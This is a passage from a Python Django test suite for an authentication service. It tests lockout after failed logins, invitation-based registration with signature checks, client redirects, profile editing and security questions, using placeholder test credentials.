cls.user = get_user_model().objects.create_user(
username="user_{}".format(random.randint(0, 10000)),
password="password",
birth_date=datetime.date(2001, 1, 1)
)
cls.user.save()
def setUp(self):
super(TestLockout, self).setUp()
def test_lockout(self):
login_url = reverse("login")
login_data = {
"login_view-current_step": "auth",
"auth-username": self.user.username,
"auth-password": "wrongpassword"
}
allowed_attempts = settings.DEFENDER_LOGIN_FAILURE_LIMIT
attempt = 0
while attempt < allowed_attempts:
attempt += 1
self.client.get(login_url)
response = self.client.post(login_url, login_data)
self.assertEqual(response.status_code, 200)
self.assertIn("authentication_service/login.html",
response.template_name)
# The next (failed) attempt needs to prevent further login attempts
self.client.get(login_url)
response = self.client.post(login_url, login_data, follow=True)
self.assertEqual([template.name for template in response.templates],
["authentication_service/lockout.html",
"base.html"])
# Even using the proper password, the user will still be blocked.
login_data["auth-password"] = "password"
self.client.get(login_url)
response = self.client.post(login_url, login_data, follow=True)
self.assertEqual([template.name for template in response.templates],
["authentication_service/lockout.html",
"base.html"])
# Manually unblock the username. This allows the user to try again.
unblock_username(self.user.username)
self.client.get(login_url)
response = self.client.post(login_url, login_data)
self.assertEqual(response.status_code, 302)
class TestSecurityQuestionLockout(TestCase):
@classmethod
def setUpTestData(cls):
super(TestSecurityQuestionLockout, cls).setUpTestData()
cls.user = get_user_model().objects.create_user(
username="user_who_forgot_creds",
password="Qwer!234",
birth_date=datetime.date(2001, 1, 1)
)
cls.user.save()
cls.question_one = SecurityQuestion.objects.create(
question_text="Some text for the one question"
)
cls.question_two = SecurityQuestion.objects.create(
question_text="Some text for the other question"
)
cls.user_answer_one = UserSecurityQuestion.objects.create(
question=cls.question_one,
user=cls.user,
answer="right"
)
cls.user_answer_two = UserSecurityQuestion.objects.create(
question=cls.question_two,
user=cls.user,
answer="right"
)
def test_lockout_on_reset(self):
# Ensure user is not blocked
unblock_username(self.user.username)
session = self.client.session
session["lookup_user_id"] = str(self.user.id)
session.save()
reset_url = reverse("reset_password_security_questions")
reset_data = {
"login_view-current_step": "auth",
"auth-username": self.user.username,
"question_%s" % self.user_answer_one.id: "test",
"question_%s" % self.user_answer_two.id: "answer"
}
allowed_attempts = settings.DEFENDER_LOGIN_FAILURE_LIMIT
attempt = 0
while attempt < allowed_attempts:
attempt += 1
self.client.get(reset_url)
response = self.client.post(reset_url, reset_data)
self.assertEqual(response.status_code, 200)
self.assertIn(
"authentication_service/reset_password/security_questions.html",
response.template_name
)
self.client.get(reset_url)
response = self.client.post(reset_url, reset_data, follow=True)
self.assertEqual([template.name for template in response.templates],
["authentication_service/lockout.html",
"base.html"])
# Even attempting via the password reset page won't work
response = self.client.get(reverse("reset_password"))
self.assertEqual(response.status_code, 200)
response = self.client.post(
reverse("reset_password"), {"email": self.user.username}, follow=True)
self.assertEqual([template.name for template in response.templates],
["authentication_service/lockout.html",
"base.html"])
unblock_username(self.user.username)
self.client.get(reset_url)
response = self.client.post(reset_url, reset_data)
self.assertEqual(response.status_code, 200)
self.assertIn(
"authentication_service/reset_password/security_questions.html",
response.template_name
)
class TestRegistrationView(TestCase):
@classmethod
def setUpTestData(cls):
super(TestRegistrationView, cls).setUpTestData()
# Security questions
cls.question_one = SecurityQuestion.objects.create(
question_text="Some text for the one question"
)
cls.question_two = SecurityQuestion.objects.create(
question_text="Some text for the other question"
)
cls.question_three = SecurityQuestion.objects.create(
question_text="Some text Three"
)
cls.question_four = SecurityQuestion.objects.create(
question_text="Some text Four"
)
cls.question_five = SecurityQuestion.objects.create(
question_text="Some text Five"
)
cls.client_obj = Client.objects.create(
client_id="redirect-tester",
name= "RedirectClient",
client_secret= "super_client_secret_4",
response_type= "code",
jwt_alg= "HS256",
redirect_uris= ["/test-redirect-url/"],
)
cls.admin_user = get_user_model().objects.create_user(
username="user_{}".format(random.randint(0, 10000)),
password="password",
birth_date=datetime.date(2001, 1, 1)
)
cls.organisation = Organisation.objects.create(
name="inviteorg",
description="invite_text"
)
test_invitation_id = uuid.uuid4()
cls.invitation = Invitation(
id=test_invitation_id.hex,
invitor_id=str(cls.admin_user.id),
first_name="super_cool_invitation_fname",
last_name="same_as_above_but_surname",
email="totallynotinvitation@email.com",
organisation_id=cls.organisation.id,
expires_at=timezone.now() + datetime.timedelta(minutes=10),
created_at=timezone.now(),
updated_at=timezone.now()
)
def test_logged_in_user(self):
url = reverse('registration')
res = self.client.get(url)
self.assertEqual(res.status_code, 302)
self.assertIn(url, res.url)
# force login a user, now he should not see registration page
self.client.force_login(self.admin_user)
res = self.client.get(url)
self.assertRedirects(res, reverse('edit_profile'))
def test_invite_tampered_signature(self):
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
params = {
"security": "high",
"invitation_id": invite_id
}
tampered_signature = signing.dumps(params, salt="invitation") + "m"
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.get(
reverse("registration"
) + f"?invitation={tampered_signature}",
follow=True
)
params = {
"security": "high",
}
incorrect_signature = signing.dumps(params, salt="invitation")
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.get(
reverse("registration"
) + f"?invitation={incorrect_signature}",
follow=True
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
@patch("authentication_service.api_helpers.get_invitation_data")
def test_invite_missing(self, mocked_get_invitation_data):
mocked_get_invitation_data.return_value = {"error": True}
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
params = {
"security": "high",
"invitation_id": invite_id
}
signature = signing.dumps(params, salt="invitation")
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.get(
reverse("registration"
) + f"?invitation={signature}",
follow=True
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_expire(self):
test_invitation_id = uuid.uuid4()
invitation = Invitation(
id=test_invitation_id.hex,
invitor_id=str(self.admin_user.id),
first_name="super_cool_invitation_fname",
last_name="same_as_above_but_surname",
email="totallynotinvitation@email.com",
organisation_id=10,
expires_at=timezone.now() - datetime.timedelta(minutes=10),
created_at=timezone.now(),
updated_at=timezone.now()
)
with mock.patch("authentication_service.api_helpers.settings") as mocked_settings:
mocked_settings.ACCESS_CONTROL_API.invitation_read.return_value = invitation
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
params = {
"security": "high",
"invitation_id": invite_id
}
signature = signing.dumps(params, salt="invitation")
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.get(
reverse("registration"
) + f"?invitation={signature}",
follow=True
)
self.assertContains(response, "The invitation has expired.")
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_form_initial(self):
with mock.patch("authentication_service.api_helpers.settings") as mocked_settings:
mocked_settings.ACCESS_CONTROL_API.invitation_read.return_value = self.invitation
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
params = {
"security": "high",
"invitation_id": invite_id
}
signature = signing.dumps(params, salt="invitation")
response = self.client.get(
reverse("registration"
) + f"?invitation={signature}",
follow=True
)
self.assertIn(
"/registration/userdata/",
response.redirect_chain[-1][0],
)
self.assertEqual(
response.context["form"].initial,
{
"first_name": "super_cool_invitation_fname",
"last_name": "same_as_above_but_surname",
"email": "totallynotinvitation@email.com"
}
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
@patch("authentication_service.api_helpers.invitation_redeem")
def test_form_redeem_failure(self, mocked_redeem):
with mock.patch("authentication_service.api_helpers.settings") as mocked_settings:
mocked_settings.ACCESS_CONTROL_API.invitation_read.return_value = self.invitation
mocked_redeem.return_value = {
"error": True
}
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
params = {
"security": "high",
"invitation_id": invite_id
}
signature = signing.dumps(params, salt="invitation")
response = self.client.get(
reverse("registration"
) + f"?invitation={signature}",
follow=True
)
self.assertIn(
"/registration/userdata/",
response.redirect_chain[-1][0],
)
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username",
"userdata-password1": "@32786AGYJUFEtyfusegh,.,",
"userdata-password2": "@32786AGYJUFEtyfusegh,.,",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "email@email.com",
},
follow=True
)
self.assertContains(response, "Oops. You have")
@override_settings(ACCESS_CONTROL_API=MagicMock())
@patch("authentication_service.api_helpers.invitation_redeem")
def test_org_missing_failure(self, mocked_redeem):
test_invitation_id = uuid.uuid4()
invitation = Invitation(
id=test_invitation_id.hex,
invitor_id=str(self.admin_user.id),
first_name="super_cool_invitation_fname",
last_name="same_as_above_but_surname",
email="totallynotinvitation@email.com",
organisation_id=845459,
expires_at=timezone.now() + datetime.timedelta(minutes=10),
created_at=timezone.now(),
updated_at=timezone.now()
)
with mock.patch("authentication_service.api_helpers.settings") as mocked_settings:
mocked_settings.ACCESS_CONTROL_API.invitation_read.return_value = invitation
mocked_redeem.return_value = {
"error": True
}
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
params = {
"security": "high",
"invitation_id": invite_id
}
signature = signing.dumps(params, salt="invitation")
response = self.client.get(
reverse("registration"
) + f"?invitation={signature}",
)
self.assertEqual(response.status_code, 404)
@override_settings(ACCESS_CONTROL_API=MagicMock())
@patch("authentication_service.api_helpers.invitation_redeem")
def test_form_redeem_success(self, mocked_redeem):
# NOTE self.invitation.id != invite_id, due to invitation values being
# mocked as well.
with mock.patch("authentication_service.api_helpers.settings") as mocked_settings:
mocked_settings.ACCESS_CONTROL_API.invitation_read.return_value = self.invitation
mocked_redeem.return_value = {
"error": False
}
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
params = {
"security": "high",
"invitation_id": invite_id
}
signature = signing.dumps(params, salt="invitation")
response = self.client.get(
reverse("registration"
) + f"?invitation={signature}",
follow=True
)
self.assertIn(
"/registration/userdata/",
response.redirect_chain[-1][0],
)
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "AmazingInviteUser",
"userdata-password1": "@A2315,./,asDV",
"userdata-password2": "@A2315,./,asDV",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "email@email.com",
},
follow=True
)
user = get_user_model().objects.get(username="AmazingInviteUser")
mocked_settings.ACCESS_CONTROL_API.invitation_read.assert_called_with(invite_id)
mocked_redeem.assert_called_with(self.invitation.id, user.id)
self.assertContains(response, "Congratulations, you have successfully")
self.assertEqual(user.organisation, self.organisation)
@override_settings(ACCESS_CONTROL_API=MagicMock())
@patch("authentication_service.api_helpers.invitation_redeem")
def test_form_redeem_success_with_invitation_redirect(self, mocked_redeem):
# NOTE self.invitation.id != invite_id, due to invitation values being
# mocked as well.
with mock.patch("authentication_service.api_helpers.settings") as mocked_settings:
mocked_settings.ACCESS_CONTROL_API.invitation_read.return_value = self.invitation
mocked_redeem.return_value = {
"error": False
}
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
redirect_url = "http://example.com/redirect?foo=bar"
params = {
"security": "high",
"invitation_id": invite_id,
"redirect_url": redirect_url
}
signature = signing.dumps(params, salt="invitation")
response = self.client.get(
reverse("registration"
) + f"?invitation={signature}",
follow=True
)
self.assertIn(
"/registration/userdata/",
response.redirect_chain[-1][0],
)
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "AmazingInviteUser",
"userdata-password1": "@A2315,./,asDV",
"userdata-password2": "@A2315,./,asDV",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "email@email.com",
},
follow=True
)
user = get_user_model().objects.get(username="AmazingInviteUser")
mocked_settings.ACCESS_CONTROL_API.invitation_read.assert_called_with(invite_id)
mocked_redeem.assert_called_with(self.invitation.id, user.id)
self.assertContains(response, "Congratulations, you have successfully")
self.assertContains(response, redirect_url)
self.assertEqual(user.organisation, self.organisation)
def test_view_success_template(self):
# Test most basic iteration
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username",
"userdata-password1": "@A2315,./,asDV",
"userdata-password2": "@A2315,./,asDV",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "email@email.com",
},
follow=True
)
def test_view_success_template_age(self):
# Test most basic registration with age instead of birth_date
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username0",
"userdata-password1": "password",
"userdata-password2": "password",
"userdata-gender": "female",
"userdata-age": "16",
"userdata-terms": True,
"userdata-email": "email1@email.com",
},
follow=True
)
def test_view_success_template_age_and_bday(self):
# Test most basic registration with age and birth_date. Birth_date takes precedence.
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username0a",
"userdata-password1": "password",
"userdata-password2": "password",
"userdata-birth_date": "1999-01-01",
"userdata-gender": "female",
"userdata-age": "16",
"userdata-terms": True,
"userdata-email": "email2@email.com",
},
follow=True
)
@patch("authentication_service.signals.api_helpers.get_site_for_client")
def test_view_success_redirects_no_2fa(self, api_mock):
api_mock.return_value = 2
response = self.client.get(
reverse(
"registration"
) + "?client_id=redirect-tester&redirect_uri=/test-redirect-url/",
follow=True
)
self.assertEquals(
self.client.session[
constants.EXTRA_SESSION_KEY][
constants.SessionKeys.CLIENT_NAME],
self.client_obj.name
)
self.assertEquals(
self.client.session[
constants.EXTRA_SESSION_KEY][
constants.SessionKeys.CLIENT_URI],
"/test-redirect-url/"
)
self.assertEquals(
response.context["ge_global_redirect_uri"], "/test-redirect-url/"
)
self.assertEquals(
response.context["ge_global_client_name"], self.client_obj.name
)
# Test redirect url, no 2fa
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username1",
"userdata-password1": "password",
"userdata-password2": "password",
"userdata-birth_date": "1999-01-01",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-terms": True,
"userdata-email": "email2@email.com",
},
follow=True
)
self.assertEquals(response.redirect_chain[-1][0], "/test-redirect-url/")
@patch("authentication_service.signals.api_helpers.get_site_for_client")
def test_view_success_redirects_2fa(self, api_mock):
api_mock.return_value = 2
response = self.client.get(
reverse(
"registration"
) + "?client_id=redirect-tester&redirect_uri=/test-redirect-url/",
follow=True
)
self.assertEquals(
self.client.session[
constants.EXTRA_SESSION_KEY][
constants.SessionKeys.CLIENT_NAME],
self.client_obj.name
)
self.assertEquals(
self.client.session[
constants.EXTRA_SESSION_KEY][
constants.SessionKeys.CLIENT_URI],
"/test-redirect-url/"
)
self.assertEquals(
response.context["ge_global_redirect_uri"], "/test-redirect-url/"
)
self.assertEquals(
response.context["ge_global_client_name"], self.client_obj.name
)
## GE-1117: Changed
# Test redirect url, 2fa
response = self.client.post(
reverse("registration") + "?show2fa=true",
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username2",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-password1": "awesom#saFe3",
"userdata-password2": "awesom#saFe3",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "email3@email.com",
"userdata-msisdn": "0856545698",
},
follow=True
)
## GE-1117: Changed
# self.assertin(response.url, reverse("two_factor_auth:setup"))
self.assertEquals(response.redirect_chain[-1][0], "/test-redirect-url/")
@patch("authentication_service.signals.api_helpers.get_site_for_client")
def test_view_success_redirects_security_high(self, api_mock):
api_mock.return_value = 2
response = self.client.get(
reverse(
"registration"
) + "?client_id=redirect-tester&redirect_uri=/test-redirect-url/",
follow=True
)
self.assertEquals(
self.client.session[
constants.EXTRA_SESSION_KEY][
constants.SessionKeys.CLIENT_NAME],
self.client_obj.name
)
self.assertEquals(
self.client.session[
constants.EXTRA_SESSION_KEY][
constants.SessionKeys.CLIENT_URI],
"/test-redirect-url/"
)
self.assertEquals(
response.context["ge_global_redirect_uri"], "/test-redirect-url/"
)
self.assertEquals(
response.context["ge_global_client_name"], self.client_obj.name
)
response = self.client.get(
reverse(
"registration"
) + "?client_id=redirect-tester&redirect_uri=/test-redirect-url/"
)
# Test redirect url, high security
response = self.client.post(
reverse("registration") + "?security=high",
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username3",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-password1": "awesom#saFe3",
"userdata-password2": "awesom#saFe3",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "email3@email.com",
"userdata-msisdn": "0856545698",
},
follow=True
)
## GE-1117: Changed
# self.assertin(response.url, reverse("two_factor_auth:setup"))
self.assertEquals(response.redirect_chain[-1][0], "/test-redirect-url/")
@patch("authentication_service.signals.api_helpers.get_site_for_client")
def test_success_redirect(self, api_mock):
api_mock.return_value = 2
# Test without redirect URI set.
response = self.client.get(reverse("redirect_view"))
self.assertIn(response.url, reverse("login"))
# Test with redirect URI set.
Client.objects.create(
client_id="redirect-tester-3",
name="RedirectClient",
client_secret="super_client_secret_4",
response_type="code",
jwt_alg="HS256",
redirect_uris=["/test-redirect-url-something/"],
)
response = self.client.get(
reverse("registration") + "?client_id=redirect-tester-3&redirect_uri=/test-redirect-url-something/",
follow=True
)
response = self.client.post(
response.redirect_chain[-1][0],
{
"registration_wizard-current_step": "userdata",
"userdata-username": "RedirectUser",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-password1": "awesom#saFe3",
"userdata-password2": "awesom#saFe3",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "email3@email.com",
"userdata-msisdn": "0856545698",
},
follow=True
)
self.assertEquals(response.redirect_chain[-1][0], "/test-redirect-url-something/")
def test_user_save(self):
## GE-1117: Changed
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration") + "?security=high",
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Unique@User@Name",
"userdata-password1": "awesom#saFe3",
"userdata-password2": "awesom#saFe3",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "emailunique@email.com",
"userdata-msisdn": "0856545698",
"userdata-gender": "female",
"userdata-age": "16",
},
follow=True
)
self.assertRedirects(
response,
reverse("registration_step", kwargs={"step": "done"})
)
# self.assertIn(response.url, reverse("two_factor_auth:setup"))
user = get_user_model().objects.get(username="Unique@User@Name")
self.assertEquals(user.email, "emailunique@email.com")
self.assertEquals(user.msisdn, "0856545698")
def test_security_questions_save(self):
## GE-1117: Changed
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Unique@User@Name",
"userdata-gender": "female",
"userdata-age": "16",
"userdata-password1": "awesom#saFe3",
"userdata-password2": "awesom#saFe3",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-msisdn": "0856545698",
},
follow=True
)
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
response.redirect_chain[-1][0],
{
"registration_wizard-current_step": "securityquestions",
"securityquestions-TOTAL_FORMS": "2",
"securityquestions-INITIAL_FORMS": "0",
"securityquestions-MIN_NUM_FORMS": "0",
"securityquestions-MAX_NUM_FORMS": "1000",
"securityquestions-0-question": self.question_one.id,
"securityquestions-0-answer": "Answer1",
"securityquestions-1-question": self.question_two.id,
"securityquestions-1-answer": "Answer2"
},
follow=True
)
# self.assertIn(response.url, reverse("two_factor_auth:setup"))
user = get_user_model().objects.get(username="Unique@User@Name")
self.assertEquals(user.msisdn, "0856545698")
question_one = UserSecurityQuestion.objects.get(
question=self.question_one,
language_code="en"
)
self.assertEquals(question_one.user, user)
question_two = UserSecurityQuestion.objects.get(
question=self.question_two,
language_code="en"
)
self.assertEquals(question_two.user, user)
def test_redirect_view(self):
# Test without redirect URI set.
response = self.client.get(reverse("redirect_view"))
self.assertIn(response.url, reverse("login"))
# Test with redirect URI set.
Client.objects.create(
client_id="redirect-tester-2",
name="RedirectClient",
client_secret="super_client_secret_4",
response_type="code",
jwt_alg="HS256",
redirect_uris=["/test-redirect-url-something/"],
)
response = self.client.get(
reverse(
"registration"
) + "?client_id=redirect-tester-2&redirect_uri=/test-redirect-url-something/",
)
response = self.client.get(
reverse(
"redirect_view"
)
)
self.assertEquals(response.url, "/test-redirect-url-something/")
def test_incorrect_required_field_logger(self):
test_output = [
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield'
]
test_output.sort()
with self.assertLogs(level="WARNING") as cm:
self.client.get(
reverse("registration") +
"?requires=names"
# TODO: S3-reliant
#"&requires=picture"
"&requires=someawesomefield"
"&requires=notontheform",
follow=True
)
output = cm.output
output.sort()
self.assertListEqual(output, test_output)
def test_incorrect_hidden_field_logger(self):
test_output = [
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield'
]
test_output.sort()
with self.assertLogs(level="WARNING") as cm:
self.client.get(
reverse("registration") +
"?hide=end-user"
# TODO: S3-reliant
#"&hide=avatar"
"&hide=someawesomefield"
"&hide=notontheform",
follow=True
)
output = cm.output
output.sort()
self.assertListEqual(output, test_output)
def test_view_terms_html(self):
Client.objects.create(
client_id="registraion_client_id",
name= "RegistrationMigrationCLient",
client_secret= "super_client_secret_1",
response_type= "code",
jwt_alg= "HS256",
redirect_uris= ["http://exmpl.co/"],
terms_url="http://registration-terms.com"
)
response = self.client.get(
reverse("registration"),
follow=True
)
self.assertContains(response, '<a href="https://www.girleffect.org/'\
'terms-and-conditions/">Click here to view the terms and conditions</a>'
)
response = self.client.get(
reverse(
"registration"
) + "?client_id=registraion_client_id&redirect_uri=http://exmpl.co/",
follow=True,
)
self.assertContains(response, '<a href="http://registration-terms.com">'\
'Click here to view the terms and conditions</a>'
)
def test_question_preselect(self):
# Test with redirect URI set.
response = self.client.get(
reverse(
"registration"
) + f"?question_ids={self.question_four.id}&question_ids={self.question_three.id}",
follow=True
)
response = self.client.post(
response.redirect_chain[-1][0],
{
"registration_wizard-current_step": "userdata",
"userdata-username": "stupidnowrequiredtestuseroriginal",
"userdata-gender": "female",
"userdata-age": "16",
"userdata-password1": "awesom#saFe3",
"userdata-password2": "awesom#saFe3",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-msisdn": "0856545698",
},
follow=True
)
self.assertContains(
response,
f'<option value="{self.question_four.id}" selected>{self.question_four.question_text}</option>'
)
self.assertContains(
response,
f'<option value="{self.question_three.id}" selected>{self.question_three.question_text}</option>'
)
def test_question_preselect_incorrect_id(self):
# Test with redirect URI set.
response = self.client.get(
reverse(
"registration"
) + f"?question_ids=9999999&question_ids={self.question_three.id}",
follow=True
)
response = self.client.post(
response.redirect_chain[-1][0],
{
"registration_wizard-current_step": "userdata",
"userdata-username": "stupidnowrequiredtestuser",
"userdata-gender": "female",
"userdata-age": "16",
"userdata-password1": "awesom#saFe3",
"userdata-password2": "awesom#saFe3",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-msisdn": "0856545698",
},
follow=True
)
self.assertContains(
response,
f'<option value="{self.question_three.id}" selected>{self.question_three.question_text}</option>',
count=1
)
class EditProfileViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create_superuser(
username="testuser",
email="wrong@email.com",
password="Qwer!234",
birth_date=datetime.date(2001, 12, 12)
)
cls.user.save()
cls.twofa_user = get_user_model().objects.create_superuser(
username="2fa_user", password="1234", email="2fa_user@test.com",
birth_date=datetime.date(2001, 1, 1)
)
cls.twofa_user.save()
cls.totp_device = TOTPDevice.objects.create(
user=cls.twofa_user,
name="default",
confirmed=True,
key=random_hex().decode()
)
# Security questions
cls.text_one = SecurityQuestion.objects.create(
question_text="Some text for the one question"
)
cls.text_two = SecurityQuestion.objects.create(
question_text="Some text for the other question"
)
cls.question_one = UserSecurityQuestion.objects.create(
user=cls.user,
question=cls.text_one,
language_code="en",
answer="Answer1"
)
cls.question_two = UserSecurityQuestion.objects.create(
user=cls.user,
question=cls.text_two,
language_code="en",
answer="Answer2"
)
def test_profile_edit(self):
# Login user
self.client.login(username="testuser", password="Qwer!234")
# Get form
Client.objects.create(
client_id="postprofileedit",
name= "RegistrationMigrationCLient",
client_secret= "super_client_secret_1",
response_type= "code",
jwt_alg= "HS256",
redirect_uris= ["/admin/"],
terms_url="http://registration-terms.com"
)
response = self.client.get(
reverse(
"edit_profile"
) + "?client_id=postprofileedit&redirect_uri=/admin/",
)
# Check 2FA isn't enabled
self.assertNotContains(response, "2fa")
# Post form
response = self.client.post(
reverse(
"edit_profile"
),
{
"email": "test@user.com",
"birth_date": "2001-01-01",
"gender": "female"
},
follow=True
)
updated = get_user_model().objects.get(username="testuser")
self.assertEquals(updated.email, "test@user.com")
self.assertEquals(datetime.date(2001, 1, 1), updated.birth_date)
self.assertRedirects(response, reverse("admin:index"))
response = self.client.get(reverse("edit_profile"))
with mock.patch("authentication_service.forms.date") as mocked_date:
mocked_date.today.return_value = datetime.date(2018, 1, 2)
mocked_date.side_effect = lambda *args, **kw: datetime.date(*args, **kw)
response = self.client.post(
reverse("edit_profile"),
{
"email": "test@user.com",
"age": "14",
"gender": "female"
},
follow=True
)
updated = get_user_model().objects.get(username="testuser")
self.assertEquals(updated.email, "test@user.com")
self.assertEquals(datetime.date(2004, 1, 2), updated.birth_date)
def test_2fa_link_enabled(self):
# Login user
self.client.login(username="2fa_user", password="1234")
# Get form
response = self.client.get(
reverse("edit_profile")
)
# Check 2FA is enabled and present on edit page
self.assertContains(response, "2fa")
def test_security_questions_update(self):
self.client.login(username=self.user.username, password="Qwer!234")
response = self.client.post(
reverse("update_security_questions"),
{
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "2",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": self.text_one.id,
"form-0-answer": "AnswerFirst",
"form-0-id": self.question_one.id,
"form-1-question": self.text_two.id,
"form-1-answer": "AnswerSecond",
"form-1-id": self.question_two.id,
},
)
question_one = UserSecurityQuestion.objects.get(
id=self.question_one.id
)
question_two = UserSecurityQuestion.objects.get(
id=self.question_two.id
)
self.assertTrue(hashers.check_password(
"AnswerFirst".lower(),
question_one.answer)
)
self.assertTrue(hashers.check_password(
"AnswerSecond".lower(),
question_two.answer)
)
class ResetPasswordTestCase(TestCase):
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create(
username="identifiable_user", email="user@id.com",
birth_date=datetime.date(2001, 1, 1)
)
cls.user.set_password("1234")
cls.user.save()
cls.user_no_email = get_user_model().objects.create(
username="user_no_email",
birth_date=datetime.date(2001, 1, 1)
)
cls.user.set_password("1234")
cls.user.save()
cls.question_one = SecurityQuestion.objects.create(
question_text="Some text for the one question"
)
cls.question_two = SecurityQuestion.objects.create(
question_text="Some text for the other question"
)
cls.user_answer_one = UserSecurityQuestion.objects.create(
user=cls.user_no_email, question=cls.question_one,
language_code="en", answer="one"
)
cls.user_answer_two = UserSecurityQuestion.objects.create(
user=cls.user_no_email, question=cls.question_two,
language_code="en", answer="two"
)
def test_logged_in_user(self):
url = reverse('reset_password')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
# force login a user, now he should not see registration page
self.client.force_login(self.user)
